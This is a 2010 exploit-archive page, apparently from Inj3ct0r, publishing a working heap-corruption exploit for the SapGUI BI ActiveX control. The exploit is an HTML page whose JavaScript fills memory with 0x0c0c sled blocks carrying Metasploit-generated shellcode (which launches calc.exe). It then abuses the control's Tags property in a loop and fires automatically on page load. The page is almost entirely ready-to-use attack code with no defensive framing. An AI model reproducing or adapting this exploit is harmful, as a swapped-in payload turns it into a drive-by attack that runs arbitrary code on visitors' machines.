SapGUI BI v7100.1.400.8 Heap Corruption Exploit

Posted on 20 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SapGUI BI v7100.1.400.8 Heap Corruption Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===============================================
SapGUI BI v7100.1.400.8 Heap Corruption Exploit
===============================================


&lt;!--
 
Product: SapGUI BI
File: c:program filessapusiness exploreriwadmxhtml.dl
Version: 7100.1.400.8
ClassID: 30DD068D-5AD9-434C-AAAC-46ABE37194EB
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data 
IPersist Safe:  Safe for untrusted: caller,data 
KillBitSet: False
 
Vulnerable Property: Tags
--&gt;
&lt;html&gt;
 &lt;head&gt;
  &lt;title&gt;&lt;/title&gt;
  &lt;script language=&quot;JavaScript&quot; defer&gt;
 
    var buf = '';
    while (buf.length &lt; 64) buf += unescape(&quot;%u0a05&quot;);
 
 
    function Check() {
     
    // windows/exec - 557 bytes
    // http://www.metasploit.com
    // Encoder: x86/alpha_mixed
    // EXITFUNC=process, CMD=c:\windows\system32\calc.exe
    var shellcode = unescape(&quot;%uc2dd%uc92b%u38b1%u4fba%uc033%ud9a3%u2474%u5ef4%u5631%u031a%u1a56%uc683%ue204%ucfba%u2a28%u3044%u4da9%ud5cd%u5f98%u9ea9%u6f89%uf3ba%u1b21%ue7ee%u69b2%u0726%uc772%u2610%ue983%ue49c%u6b47%uf760%u4b9b%u3859%u8aee%u259e%ude01%u2177%ucfb0%u77fc%uf109%uf3d2%u8931%uc357%u23c6%u1456%u3f76%u8c10%u67fc%uad80%u7bd1%ue4fc%u4f5e%uf777%u81b6%uc978%u4ef6%ue547%u8ffa%uc280%ue5e4%u30fa%ufd98%u4a39%u8b46%uecdf%u2b0d%u0c3b%uaac1%u02c8%ub9ae%u0696%u6d31%u33ad%u90ba%ub261%ub6f8%u9ea5%ud65b%u7afc%ue70d%u221e%u4df2%uc155%uf4e7%u8c34%u75f6%ue943%u85f9%u5a4b%ub492%u35c0%u48e5%u7203%u0319%ud309%ucab2%u61d8%uecdf%ua537%u6ee6%u56bd%u6e1d%u53b4%u2859%u2e25%uddf2%u9d49%uf7f3%u1b2a%ua450%u32db%u3006%ub24c%ue4a5%u4fce%u6633%uca9a%ubbae%u4950%udf6d%u1df5%u31ee%ua590%u4d95&quot;);    
     
    var bigblock = unescape(&quot;%u0c0c&quot;);
    var headersize = 20;
    var slackspace = headersize + shellcode.length;
    while (bigblock.length &lt; slackspace) bigblock += bigblock;
    var fillblock = bigblock.substring(0,slackspace);
    var block = bigblock.substring(0,bigblock.length - slackspace);
    while (block.length + slackspace &lt; 0x40000) block = block + block + fillblock;
 
     
    var memory = new Array();
    for (i = 0; i &lt; 550; i++){ memory[i] = block + shellcode; }
             
    var jmpblock = buf.substring(0, 32);
 
    var a = new Array();
     
    for (i = 0; i &lt; 512; i++) {
        obj.Tags = jmpblock.substring(0, jmpblock.length);
        a[i] = obj.Tags.substring(0, obj.Tags.length);
        obj.Tags = '';
        a[i] += jmpblock;
    }  
 
}
 
 
 
   &lt;/script&gt;
  &lt;/head&gt;
 
 &lt;body onload=&quot;JavaScript: return Check();&quot;&gt;
&lt;object id=&quot;obj&quot; classid=&quot;clsid:30DD068D-5AD9-434c-AAAC-46ABE37194EB&quot;&gt;
        Unable to create object
    &lt;/object&gt;
 
 
 
 &lt;/body&gt;
&lt;/html&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20